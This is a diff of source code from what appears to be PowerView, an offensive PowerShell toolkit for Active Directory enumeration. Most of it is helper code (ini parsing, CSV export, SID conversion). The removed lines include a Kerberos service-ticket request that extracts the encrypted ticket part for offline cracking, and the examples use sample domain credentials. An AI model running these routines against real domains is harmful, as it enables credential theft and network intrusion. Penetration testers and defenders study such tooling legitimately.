$UACValues.Add("MNS_LOGON_ACCOUNT", 131072) - $UACValues.Add("SMARTCARD_REQUIRED", 262144) - $UACValues.Add("TRUSTED_FOR_DELEGATION", 524288) - $UACValues.Add("NOT_DELEGATED", 1048576) - $UACValues.Add("USE_DES_KEY_ONLY", 2097152) - $UACValues.Add("DONT_REQ_PREAUTH", 4194304) - $UACValues.Add("PASSWORD_EXPIRED", 8388608) - $UACValues.Add("TRUSTED_TO_AUTH_FOR_DELEGATION", 16777216) - $UACValues.Add("PARTIAL_SECRETS_ACCOUNT", 67108864) + Begin { + $InternalDictionary = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameterDictionary + function _temp { [CmdletBinding()] Param() } + $CommonParameters = (Get-Command _temp).Parameters.Keys } - process { - - $ResultUACValues = New-Object System.Collections.Specialized.OrderedDictionary - - if($Value -is [Int]) { - $IntValue = $Value - } - elseif ($Value -is [PSCustomObject]) { - if($Value.useraccountcontrol) { - $IntValue = $Value.useraccountcontrol - } - } - else { - Write-Warning "Invalid object input for -Value : $Value" - return $Null - } - - if($ShowAll) { - foreach ($UACValue in $UACValues.GetEnumerator()) { - if( ($IntValue -band $UACValue.Value) -eq $UACValue.Value) { - $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)+") - } - else { - $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)") + Process { + if($CreateVariables) { + $BoundKeys = $BoundParameters.Keys | Where-Object { $CommonParameters -notcontains $_ } + ForEach($Parameter in $BoundKeys) { + if ($Parameter) { + Set-Variable -Name $Parameter -Value $BoundParameters.$Parameter -Scope 1 -Force } } } else { - foreach ($UACValue in $UACValues.GetEnumerator()) { - if( ($IntValue -band $UACValue.Value) -eq $UACValue.Value) { - $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)") + $StaleKeys = @() + $StaleKeys = $PSBoundParameters.GetEnumerator() | + ForEach-Object { + if($_.Value.PSobject.Methods.Name -match '^Equals$') { + # If object has Equals, compare bound key and variable using it + if(!$_.Value.Equals((Get-Variable -Name $_.Key -ValueOnly -Scope 0))) { + $_.Key + } + } + else { + # If object doesn't has Equals (e.g. $null), fallback to the PowerShell's -ne operator + if($_.Value -ne (Get-Variable -Name $_.Key -ValueOnly -Scope 0)) { + $_.Key + } + } + } + if($StaleKeys) { + $StaleKeys | ForEach-Object {[void]$PSBoundParameters.Remove($_)} + } + + # Since we rely solely on $PSBoundParameters, we don't have access to default values for unbound parameters + $UnboundParameters = (Get-Command -Name ($PSCmdlet.MyInvocation.InvocationName)).Parameters.GetEnumerator() | + # Find parameters that are belong to the current parameter set + Where-Object { $_.Value.ParameterSets.Keys -contains $PsCmdlet.ParameterSetName } | + Select-Object -ExpandProperty Key | + # Find unbound parameters in the current parameter set + Where-Object { $PSBoundParameters.Keys -notcontains $_ } + + # Even if parameter is not bound, corresponding variable is created with parameter's default value (if specified) + $tmp = $null + ForEach ($Parameter in $UnboundParameters) { + $DefaultValue = Get-Variable -Name $Parameter -ValueOnly -Scope 0 + if(!$PSBoundParameters.TryGetValue($Parameter, [ref]$tmp) -and $DefaultValue) { + $PSBoundParameters.$Parameter = $DefaultValue } } - } - $ResultUACValues - } -} - - -filter Get-Proxy { -<# - .SYNOPSIS - - Enumerates the proxy server and WPAD conents for the current user. - - .PARAMETER ComputerName - The computername to enumerate proxy settings on, defaults to local host. + if($Dictionary) { + $DPDictionary = $Dictionary + } + else { + $DPDictionary = $InternalDictionary + } - .EXAMPLE + # Shortcut for getting local variables + $GetVar = {Get-Variable -Name $_ -ValueOnly -Scope 0} - PS C:\> Get-Proxy - - Returns the current proxy settings. -#> - param( - [Parameter(ValueFromPipeline=$True)] - [ValidateNotNullOrEmpty()] - [String] - $ComputerName = $ENV:COMPUTERNAME - ) + # Strings to match attributes and validation arguments + $AttributeRegex = '^(Mandatory|Position|ParameterSetName|DontShow|HelpMessage|ValueFromPipeline|ValueFromPipelineByPropertyName|ValueFromRemainingArguments)$' + $ValidationRegex = '^(AllowNull|AllowEmptyString|AllowEmptyCollection|ValidateCount|ValidateLength|ValidatePattern|ValidateRange|ValidateScript|ValidateSet|ValidateNotNull|ValidateNotNullOrEmpty)$' + $AliasRegex = '^Alias$' + $ParameterAttribute = New-Object -TypeName System.Management.Automation.ParameterAttribute - try { - $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('CurrentUser', $ComputerName) - $RegKey = $Reg.OpenSubkey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings") - $ProxyServer = $RegKey.GetValue('ProxyServer') - $AutoConfigURL = $RegKey.GetValue('AutoConfigURL') + switch -regex ($PSBoundParameters.Keys) { + $AttributeRegex { + Try { + $ParameterAttribute.$_ = . $GetVar + } + Catch { + $_ + } + continue + } + } - $Wpad = "" - if($AutoConfigURL -and ($AutoConfigURL -ne "")) { - try { - $Wpad = (New-Object Net.Webclient).DownloadString($AutoConfigURL) + if($DPDictionary.Keys -contains $Name) { + $DPDictionary.$Name.Attributes.Add($ParameterAttribute) } - catch { - Write-Warning "Error connecting to AutoConfigURL : $AutoConfigURL" + else { + $AttributeCollection = New-Object -TypeName Collections.ObjectModel.Collection[System.Attribute] + switch -regex ($PSBoundParameters.Keys) { + $ValidationRegex { + Try { + $ParameterOptions = New-Object -TypeName "System.Management.Automation.${_}Attribute" -ArgumentList (. $GetVar) -ErrorAction Stop + $AttributeCollection.Add($ParameterOptions) + } + Catch { $_ } + continue + } + $AliasRegex { + Try { + $ParameterAlias = New-Object -TypeName System.Management.Automation.AliasAttribute -ArgumentList (. $GetVar) -ErrorAction Stop + $AttributeCollection.Add($ParameterAlias) + continue + } + Catch { $_ } + } + } + $AttributeCollection.Add($ParameterAttribute) + $Parameter = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameter -ArgumentList @($Name, $Type, $AttributeCollection) + $DPDictionary.Add($Name, $Parameter) } } - - if($ProxyServer -or $AutoConfigUrl) { + } - $Properties = @{ - 'ProxyServer' = $ProxyServer - 'AutoConfigURL' = $AutoConfigURL - 'Wpad' = $Wpad - } - - New-Object -TypeName PSObject -Property $Properties - } - else { - Write-Warning "No proxy settings found for $ComputerName" + End { + if(!$CreateVariables -and !$Dictionary) { + $DPDictionary } } - catch { - Write-Warning "Error enumerating proxy settings for $ComputerName : $_" - } } -function Request-SPNTicket { +function Get-IniContent { <# - .SYNOPSIS - - Request the kerberos ticket for a specified service principal name (SPN). - - .PARAMETER SPN +.SYNOPSIS - The service principal name to request the ticket for. Required. - - .PARAMETER EncPart - - Switch. Return the encrypted portion of the ticket (cipher). +This helper parses an .ini file into a hashtable. - .EXAMPLE +Author: 'The Scripting Guys' +Modifications: @harmj0y (-Credential support) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection - PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local" - - Request a kerberos service ticket for the specified SPN. - - .EXAMPLE +.DESCRIPTION - PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local" -EncPart - - Request a kerberos service ticket for the specified SPN and return the encrypted portion of the ticket. +Parses an .ini file into a hashtable. If -Credential is supplied, +then Add-RemoteConnection is used to map \\COMPUTERNAME\IPC$, the file +is parsed, and then the connection is destroyed with Remove-RemoteConnection. + +.PARAMETER Path + +Specifies the path to the .ini file to parse. + +.PARAMETER OutputObject + +Switch. Output a custom PSObject instead of a hashtable. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. + +.EXAMPLE + +Get-IniContent C:\Windows\example.ini + +.EXAMPLE + +"C:\Windows\example.ini" | Get-IniContent -OutputObject + +Outputs the .ini details as a proper nested PSObject. + +.EXAMPLE + +"C:\Windows\example.ini" | Get-IniContent + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-IniContent -Path \\PRIMARY.testlab.local\C$\Temp\GptTmpl.inf -Credential $Cred - .EXAMPLE +.INPUTS - PS C:\> "HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Request-SPNTicket +String - Request kerberos service tickets for all SPNs passed on the pipeline. +Accepts one or more .ini paths on the pipeline. - .EXAMPLE +.OUTPUTS - PS C:\> Get-NetUser -SPN | Request-SPNTicket +Hashtable - Request kerberos service tickets for all users with non-null SPNs. +Ouputs a hashtable representing the parsed .ini file. + +.LINK + +https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/ #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([Hashtable])] [CmdletBinding()] - Param ( - [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName = $True)] - [Alias('ServicePrincipalName')] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('FullName', 'Name')] + [ValidateNotNullOrEmpty()] [String[]] - $SPN, - - [Alias('EncryptedPart')] + $Path, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + [Switch] - $EncPart + $OutputObject ) - begin { - Add-Type -AssemblyName System.IdentityModel + BEGIN { + $MappedComputers = @{} } - process { - ForEach($UserSPN in $SPN) { - Write-Verbose "Requesting ticket for: $UserSPN" - if (!$EncPart) { - New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN + PROCESS { + ForEach ($TargetPath in $Path) { + if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $HostComputer = (New-Object System.Uri($TargetPath)).Host + if (-not $MappedComputers[$HostComputer]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential + $MappedComputers[$HostComputer] = $True + } } - else { - $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN - $TicketByteStream = $Ticket.GetRequest() - if ($TicketByteStream) - { - $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace "-" - [System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201" - $Parts.RemoveAt($Parts.Count - 1) - $Parts -join "A48201" - break + + if (Test-Path -Path $TargetPath) { + if ($PSBoundParameters['OutputObject']) { + $IniObject = New-Object PSObject + } + else { + $IniObject = @{} + } + Switch -Regex -File $TargetPath { + "^\[(.+)\]" # Section + { + $Section = $matches[1].Trim() + if ($PSBoundParameters['OutputObject']) { + $Section = $Section.Replace(' ', '') + $SectionObject = New-Object PSObject + $IniObject | Add-Member Noteproperty $Section $SectionObject + } + else { + $IniObject[$Section] = @{} + } + $CommentCount = 0 + } + "^(;.*)$" # Comment + { + $Value = $matches[1].Trim() + $CommentCount = $CommentCount + 1 + $Name = 'Comment' + $CommentCount + if ($PSBoundParameters['OutputObject']) { + $Name = $Name.Replace(' ', '') + $IniObject.$Section | Add-Member Noteproperty $Name $Value + } + else { + $IniObject[$Section][$Name] = $Value + } + } + "(.+?)\s*=(.*)" # Key + { + $Name, $Value = $matches[1..2] + $Name = $Name.Trim() + $Values = $Value.split(',') | ForEach-Object { $_.Trim() } + + # if ($Values -isnot [System.Array]) { $Values = @($Values) } + + if ($PSBoundParameters['OutputObject']) { + $Name = $Name.Replace(' ', '') + $IniObject.$Section | Add-Member Noteproperty $Name $Values + } + else { + $IniObject[$Section][$Name] = $Values + } + } } + $IniObject } } } + + END { + # remove the IPC$ mappings + $MappedComputers.Keys | Remove-RemoteConnection + } } -function Get-PathAcl { +function Export-PowerViewCSV { <# - .SYNOPSIS - - Enumerates the ACL for a given file path. +.SYNOPSIS - .PARAMETER Path +Converts objects into a series of comma-separated (CSV) strings and saves the +strings in a CSV file in a thread-safe manner. - The local/remote path to enumerate the ACLs for. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - .PARAMETER Recurse - - If any ACL results are groups, recurse and retrieve user membership. +.DESCRIPTION - .EXAMPLE +This helper exports an -InputObject to a .csv in a thread-safe manner +using a mutex. This is so the various multi-threaded functions in +PowerView has a thread-safe way to export output to the same file. +Uses .NET IO.FileStream/IO.StreamWriter objects for speed. - PS C:\> Get-PathAcl "\\SERVER\Share\" - - Returns ACLs for the given UNC share. -#> - [CmdletBinding()] - param( - [Parameter(Mandatory=$True, ValueFromPipeline=$True)] - [String] - $Path, +Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590 - [Switch] - $Recurse - ) +.PARAMETER InputObject - begin { +Specifies the objects to export as CSV strings. - function Convert-FileRight { +.PARAMETER Path - # From http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights +Specifies the path to the CSV output file. - [CmdletBinding()] - param( - [Int] - $FSR - ) +.PARAMETER Delimiter - $AccessMask = @{ - [uint32]'0x80000000' = 'GenericRead' - [uint32]'0x40000000' = 'GenericWrite' - [uint32]'0x20000000' = 'GenericExecute' - [uint32]'0x10000000' = 'GenericAll' - [uint32]'0x02000000' = 'MaximumAllowed' - [uint32]'0x01000000' = 'AccessSystemSecurity' - [uint32]'0x00100000' = 'Synchronize' - [uint32]'0x00080000' = 'WriteOwner' - [uint32]'0x00040000' = 'WriteDAC' - [uint32]'0x00020000' = 'ReadControl' - [uint32]'0x00010000' = 'Delete' - [uint32]'0x00000100' = 'WriteAttributes' - [uint32]'0x00000080' = 'ReadAttributes' - [uint32]'0x00000040' = 'DeleteChild' - [uint32]'0x00000020' = 'Execute/Traverse' - [uint32]'0x00000010' = 'WriteExtendedAttributes' - [uint32]'0x00000008' = 'ReadExtendedAttributes' - [uint32]'0x00000004' = 'AppendData/AddSubdirectory' - [uint32]'0x00000002' = 'WriteData/AddFile' - [uint32]'0x00000001' = 'ReadData/ListDirectory' - } +Specifies a delimiter to separate the property values. The default is a comma (,) - $SimplePermissions = @{ - [uint32]'0x1f01ff' = 'FullControl' - [uint32]'0x0301bf' = 'Modify' - [uint32]'0x0200a9' = 'ReadAndExecute' - [uint32]'0x02019f' = 'ReadAndWrite' - [uint32]'0x020089' = 'Read' - [uint32]'0x000116' = 'Write' - } +.PARAMETER Append - $Permissions = @() +Indicates that this cmdlet adds the CSV output to the end of the specified file. +Without this parameter, Export-PowerViewCSV replaces the file contents without warning. - # get simple permission - $Permissions += $SimplePermissions.Keys | % { - if (($FSR -band $_) -eq $_) { - $SimplePermissions[$_] - $FSR = $FSR -band (-not $_) - } - } +.EXAMPLE - # get remaining extended permissions - $Permissions += $AccessMask.Keys | - ? { $FSR -band $_ } | - % { $AccessMask[$_] } +Get-DomainUser | Export-PowerViewCSV -Path "users.csv" - ($Permissions | ?{$_}) -join "," - } - } +.EXAMPLE - process { +Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|' - try { - $ACL = Get-Acl -Path $Path +.INPUTS - $ACL.GetAccessRules($true,$true,[System.Security.Principal.SecurityIdentifier]) | ForEach-Object { +PSObject - $Names = @() - if ($_.IdentityReference -match '^S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+') { - $Object = Get-ADObject -SID $_.IdentityReference - $Names = @() - $SIDs = @($Object.objectsid) +Accepts one or more PSObjects on the pipeline. - if ($Recurse -and (@('268435456','268435457','536870912','536870913') -contains $Object.samAccountType)) { - $SIDs += Get-NetGroupMember -SID $Object.objectsid | Select-Object -ExpandProperty MemberSid - } +.LINK - $SIDs | ForEach-Object { - $Names += ,@($_, (Convert-SidToName $_)) - } - } - else { - $Names += ,@($_.IdentityReference.Value, (Convert-SidToName $_.IdentityReference.Value)) - } +http://poshcode.org/1590 +http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/ +#> - ForEach($Name in $Names) { - $Out = New-Object PSObject - $Out | Add-Member Noteproperty 'Path' $Path - $Out | Add-Member Noteproperty 'FileSystemRights' (Convert-FileRight -FSR $_.FileSystemRights.value__) - $Out | Add-Member Noteproperty 'IdentityReference' $Name[1] - $Out | Add-Member Noteproperty 'IdentitySID' $Name[0] - $Out | Add-Member Noteproperty 'AccessControlType' $_.AccessControlType - $Out - } - } + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [System.Management.Automation.PSObject[]] + $InputObject, + + [Parameter(Mandatory = $True, Position = 1)] + [ValidateNotNullOrEmpty()] + [String] + $Path, + + [Parameter(Position = 2)] + [ValidateNotNullOrEmpty()] + [Char] + $Delimiter = ',', + + [Switch] + $Append + ) + + BEGIN { + $OutputPath = [IO.Path]::GetFullPath($PSBoundParameters['Path']) + $Exists = [System.IO.File]::Exists($OutputPath) + + # mutex so threaded code doesn't stomp on the output file + $Mutex = New-Object System.Threading.Mutex $False,'CSVMutex' + $Null = $Mutex.WaitOne() + + if ($PSBoundParameters['Append']) { + $FileMode = [System.IO.FileMode]::Append } - catch { - Write-Warning $_ + else { + $FileMode = [System.IO.FileMode]::Create + $Exists = $False + } + + $CSVStream = New-Object IO.FileStream($OutputPath, $FileMode, [System.IO.FileAccess]::Write, [IO.FileShare]::Read) + $CSVWriter = New-Object System.IO.StreamWriter($CSVStream) + $CSVWriter.AutoFlush = $True + } + + PROCESS { + ForEach ($Entry in $InputObject) { + $ObjectCSV = ConvertTo-Csv -InputObject $Entry -Delimiter $Delimiter -NoTypeInformation + + if (-not $Exists) { + # output the object field names as well + $ObjectCSV | ForEach-Object { $CSVWriter.WriteLine($_) } + $Exists = $True + } + else { + # only output object field data + $ObjectCSV[1..($ObjectCSV.Length-1)] | ForEach-Object { $CSVWriter.WriteLine($_) } + } } } + + END { + $Mutex.ReleaseMutex() + $CSVWriter.Dispose() + $CSVStream.Dispose() + } } -filter Get-NameField { +function Resolve-IPAddress { <# - .SYNOPSIS - - Helper that attempts to extract appropriate field names from - passed computer objects. +.SYNOPSIS - .PARAMETER Object +Resolves a given hostename to its associated IPv4 address. - The passed object to extract name fields from. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - .PARAMETER DnsHostName - - A DnsHostName to extract through ValueFromPipelineByPropertyName. +.DESCRIPTION - .PARAMETER Name - - A Name to extract through ValueFromPipelineByPropertyName. +Resolves a given hostename to its associated IPv4 address using +[Net.Dns]::GetHostEntry(). If no hostname is provided, the default +is the IP address of the localhost. - .EXAMPLE +.EXAMPLE - PS C:\> Get-NetComputer -FullData | Get-NameField -#> - [CmdletBinding()] - param( - [Parameter(ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] - [Object] - $Object, +Resolve-IPAddress -ComputerName SERVER - [Parameter(ValueFromPipelineByPropertyName = $True)] - [String] - $DnsHostName, +.EXAMPLE - [Parameter(ValueFromPipelineByPropertyName = $True)] - [String] - $Name - ) +@("SERVER1", "SERVER2") | Resolve-IPAddress - if($PSBoundParameters['DnsHostName']) { - $DnsHostName - } - elseif($PSBoundParameters['Name']) { - $Name - } - elseif($Object) { - if ( [bool]($Object.PSobject.Properties.name -match "dnshostname") ) { - # objects from Get-NetComputer - $Object.dnshostname - } - elseif ( [bool]($Object.PSobject.Properties.name -match "name") ) { - # objects from Get-NetDomainController - $Object.name - } - else { - # strings and catch alls - $Object - } - } - else { - return $Null - } -} +.INPUTS +String -function Convert-LDAPProperty { -<# - .SYNOPSIS - - Helper that converts specific LDAP property result fields. - Used by several of the Get-Net* function. +Accepts one or more IP address strings on the pipeline. + +.OUTPUTS - .PARAMETER Properties +System.Management.Automation.PSCustomObject - Properties object to extract out LDAP fields for display. +A custom PSObject with the ComputerName and IPAddress. #> - param( - [Parameter(Mandatory=$True, ValueFromPipeline=$True)] + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.Management.Automation.PSCustomObject')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] [ValidateNotNullOrEmpty()] - $Properties + [String[]] + $ComputerName = $Env:COMPUTERNAME ) - $ObjectProperties = @{} - - $Properties.PropertyNames | ForEach-Object { - if (($_ -eq "objectsid") -or ($_ -eq "sidhistory")) { - # convert the SID to a string - $ObjectProperties[$_] = (New-Object System.Security.Principal.SecurityIdentifier($Properties[$_][0],0)).Value - } - elseif($_ -eq "objectguid") { - # convert the GUID to a string - $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid - } - elseif( ($_ -eq "lastlogon") -or ($_ -eq "lastlogontimestamp") -or ($_ -eq "pwdlastset") -or ($_ -eq "lastlogoff") -or ($_ -eq "badPasswordTime") ) { - # convert timestamps - if ($Properties[$_][0] -is [System.MarshalByRefObject]) { - # if we have a System.__ComObject - $Temp = $Properties[$_][0] - [Int32]$High = $Temp.GetType().InvokeMember("HighPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) - [Int32]$Low = $Temp.GetType().InvokeMember("LowPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) - $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low))) - } - else { - $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0]))) - } - } - elseif($Properties[$_][0] -is [System.MarshalByRefObject]) { - # try to convert misc com objects - $Prop = $Properties[$_] + PROCESS { + ForEach ($Computer in $ComputerName) { try { - $Temp = $Prop[$_][0] - Write-Verbose $_ - [Int32]$High = $Temp.GetType().InvokeMember("HighPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) - [Int32]$Low = $Temp.GetType().InvokeMember("LowPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) - $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low) + @(([Net.Dns]::GetHostEntry($Computer)).AddressList) | ForEach-Object { + if ($_.AddressFamily -eq 'InterNetwork') { + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'ComputerName' $Computer + $Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString + $Out + } + } } catch { - $ObjectProperties[$_] = $Prop[$_] + Write-Verbose "[Resolve-IPAddress] Could not resolve $Computer to an IP Address." } } - elseif($Properties[$_].count -eq 1) { - $ObjectProperties[$_] = $Properties[$_][0] - } - else { - $ObjectProperties[$_] = $Properties[$_] - } } - - New-Object -TypeName PSObject -Property $ObjectProperties } +function ConvertTo-SID { +<# +.SYNOPSIS -######################################################## -# -# Domain info functions below. -# -######################################################## +Converts a given user/group name to a security identifier (SID). -filter Get-DomainSearcher { -<# - .SYNOPSIS +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain - Helper used by various functions that takes an ADSpath and - domain specifier and builds the correct ADSI searcher object. +.DESCRIPTION - .PARAMETER Domain +Converts a "DOMAIN\username" syntax to a security identifier (SID) +using System.Security.Principal.NTAccount's translate function. If alternate +credentials are supplied, then Get-ADObject is used to try to map the name +to a security identifier. - The domain to use for the query, defaults to the current domain. +.PARAMETER ObjectName - .PARAMETER DomainController +The user/group name to convert, can be 'user' or 'DOMAIN\user' format. - Domain controller to reflect LDAP queries through. +.PARAMETER Domain - .PARAMETER ADSpath +Specifies the domain to use for the translation, defaults to the current domain. - The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +.PARAMETER Server - .PARAMETER ADSprefix +Specifies an Active Directory server (domain controller) to bind to for the translation. - Prefix to set for the searcher (like "CN=Sites,CN=Configuration") +.PARAMETER Credential - .PARAMETER PageSize +Specifies an alternate credential to use for the translation. - The PageSize to set for the LDAP searcher object. +.EXAMPLE - .PARAMETER Credential +ConvertTo-SID 'DEV\dfm' - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.EXAMPLE - .EXAMPLE +'DEV\dfm','DEV\krbtgt' | ConvertTo-SID - PS C:\> Get-DomainSearcher -Domain testlab.local +.EXAMPLE - .EXAMPLE +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred - PS C:\> Get-DomainSearcher -Domain testlab.local -DomainController SECONDARY.dev.testlab.local -#> +.INPUTS - param( - [Parameter(ValueFromPipeline=$True)] - [String] - $Domain, +String - [String] - $DomainController, +Accepts one or more username specification strings on the pipeline. - [String] - $ADSpath, +.OUTPUTS + +String +A string representing the SID of the translated name. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([String])] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name', 'Identity')] + [String[]] + $ObjectName, + + [ValidateNotNullOrEmpty()] [String] - $ADSprefix, + $Domain, - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - if(-not $Credential) { - if(-not $Domain) { - $Domain = (Get-NetDomain).name - } - elseif(-not $DomainController) { - try { - # if there's no -DomainController specified, try to pull the primary DC to reflect queries through - $DomainController = ((Get-NetDomain).PdcRoleOwner).Name - } - catch { - throw "Get-DomainSearcher: Error in retrieving PDC for current domain" - } - } - } - elseif (-not $DomainController) { - # if a DC isn't specified - try { - $DomainController = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name - } - catch { - throw "Get-DomainSearcher: Error in retrieving PDC for current domain" - } - - if(!$DomainController) { - throw "Get-DomainSearcher: Error in retrieving PDC for current domain" - } + BEGIN { + $DomainSearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $DomainSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $DomainSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $DomainSearcherArguments['Credential'] = $Credential } } - $SearchString = "LDAP://" + PROCESS { + ForEach ($Object in $ObjectName) { + $Object = $Object -Replace '/','\' - if($DomainController) { - $SearchString += $DomainController - if($Domain){ - $SearchString += '/' - } - } + if ($PSBoundParameters['Credential']) { + $DN = Convert-ADName -Identity $Object -OutputType 'DN' @DomainSearcherArguments + if ($DN) { + $UserDomain = $DN.SubString($DN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + $UserName = $DN.Split(',')[0].split('=')[1] - if($ADSprefix) { - $SearchString += $ADSprefix + ',' - } + $DomainSearcherArguments['Identity'] = $UserName + $DomainSearcherArguments['Domain'] = $UserDomain + $DomainSearcherArguments['Properties'] = 'objectsid' + Get-DomainObject @DomainSearcherArguments | Select-Object -Expand objectsid + } + } + else { + try { + if ($Object.Contains('\')) { + $Domain = $Object.Split('\')[0] + $Object = $Object.Split('\')[1] + } + elseif (-not $PSBoundParameters['Domain']) { + $DomainSearcherArguments = @{} + $Domain = (Get-Domain @DomainSearcherArguments).Name + } - if($ADSpath) { - if($ADSpath -Match '^GC://') { - # if we're searching the global catalog - $DN = $AdsPath.ToUpper().Trim('/') - $SearchString = '' - } - else { - if($ADSpath -match '^LDAP://') { - if($ADSpath -match "LDAP://.+/.+") { - $SearchString = '' + $Obj = (New-Object System.Security.Principal.NTAccount($Domain, $Object)) + $Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value } - else { - $ADSpath = $ADSpath.Substring(7) + catch { + Write-Verbose "[ConvertTo-SID] Error converting $Domain\$Object : $_" } } - $DN = $ADSpath } } - else { - if($Domain -and ($Domain.Trim() -ne "")) { - $DN = "DC=$($Domain.Replace('.', ',DC='))" - } - } - - $SearchString += $DN - Write-Verbose "Get-DomainSearcher search string: $SearchString" - - if($Credential) { - Write-Verbose "Using alternate credentials for LDAP connection" - $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password) - $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject) - } - else { - $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) - } - - $Searcher.PageSize = $PageSize - $Searcher.CacheResults = $False - $Searcher } -filter Convert-DNSRecord { +function ConvertFrom-SID { <# - .SYNOPSIS +.SYNOPSIS - Decodes a binary DNS record. +Converts a security identifier (SID) to a group/user name. - Adapted/ported from Michael B. Smith's code at https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1 +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Convert-ADName - .PARAMETER DNSRecord +.DESCRIPTION - The domain to query for zones, defaults to the current domain. +Converts a security identifier string (SID) to a group/user name +using Convert-ADName. - .LINK +.PARAMETER ObjectSid - https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1 -#> - param( - [Parameter(Position=0, ValueFromPipelineByPropertyName=$True, Mandatory=$True)] - [Byte[]] - $DNSRecord - ) +Specifies one or more SIDs to convert. - function Get-Name { - # modified decodeName from https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1 - [CmdletBinding()] - param( - [Byte[]] - $Raw - ) +.PARAMETER Domain - [Int]$Length = $Raw[0] - [Int]$Segments = $Raw[1] - [Int]$Index = 2 - [String]$Name = "" +Specifies the domain to use for the translation, defaults to the current domain. - while ($Segments-- -gt 0) - { - [Int]$SegmentLength = $Raw[$Index++] - while ($SegmentLength-- -gt 0) { - $Name += [Char]$Raw[$Index++] - } - $Name += "." - } - $Name - } 